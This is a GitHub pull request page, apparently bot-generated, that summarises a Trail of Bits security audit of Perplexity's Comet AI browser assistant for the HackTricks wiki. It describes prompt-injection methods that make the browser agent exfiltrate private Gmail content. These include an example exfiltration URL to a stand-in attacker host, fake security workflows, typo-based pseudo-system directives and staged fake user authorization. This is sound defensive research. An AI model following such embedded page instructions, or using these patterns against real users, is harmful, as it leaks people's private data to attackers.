Skip to content

Comments

Using threat modeling and prompt injection to audit Comet#1926

Open
carlospolop wants to merge 1 commit intomasterfrom
update_Using_threat_modeling_and_prompt_injection_to_audi_20260220_184453
Open

Using threat modeling and prompt injection to audit Comet#1926
carlospolop wants to merge 1 commit intomasterfrom
update_Using_threat_modeling_and_prompt_injection_to_audi_20260220_184453

Conversation

@carlospolop
Copy link
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

Title / context
Trail of Bits performed a pre-launch security assessment (April 2025 audit) of Perplexity’s Comet browser, focusing on its LLM-powered “agentic browsing” sidebar assistant. Using an ML-centered threat modeling process (TRAIL) plus hands-on adversarial prompt-injection testing, they demonstrated multiple proof-of-concept (PoC) prompt injections that exfiltrate private Gmail email content to an attacker-controlled server when a user simply asks the assistant to summarize...

🔧 Technical Details

Tool-enabled prompt injection (confused deputy) in agentic browsers: If an AI browser agent can navigate, fetch URLs, read page content/history, and act like a user, then any untrusted webpage content that the model treats as instructions can drive those tools across trust boundaries. A common exploit pattern is: embed multi-step “how to summarize” procedures that force navigation to sensitive targets (often via redirects that reuse existing authenticated cookies), collect the resulting sensitive DOM/text, then exfiltrate it to an attacker-controlled endpoint.

Exfiltration via URL-encoded query parameters: A practical low-level channel is instructing the agent to visit an attacker URL like https://attacker.example/combine?data=[URL_ENCODED_SECRET] (or multiple fragment parameters). If the agent copies sensitive text (e.g., from an authenticated page) and URL-encodes it into the query string, the attacker receives the secret in server logs/requests wi...

🤖 Agent Actions

Summary:

  • Added a new “Agentic browsing/tool-enabled prompt injection (Comet PoCs)” subsection to AI-Prompts.md detailing the Comet audit exploitation patterns: Gmail exfil via redirect + URL-encoded query params, fragment-based summarization flows, fake security workflows, pseudo-system directives with typo-based bypass, staged fake user authorization, and the confused-deputy trust boundary.
  • Highlighted the generic exploit recipe and low-friction exfil channel for browser agents with tool access, including concrete instruction patterns.
  • Added the Trail of Bits Comet audit blog to the references.

Tests:

  • Not run (documentation-only changes).

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop
Copy link
Collaborator Author

🔗 Additional Context

Original Blog Post: https://blog.trailofbits.com/2026/02/20/using-threat-modeling-and-prompt-injection-to-audit-comet/

Content Categories: Based on the analysis, this content was categorized under "AI Security -> Prompt Injection (add subsection: Agentic browsing/tool-enabled prompt injection & data exfiltration patterns)".

Repository Maintenance:

  • MD Files Formatting: 948 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant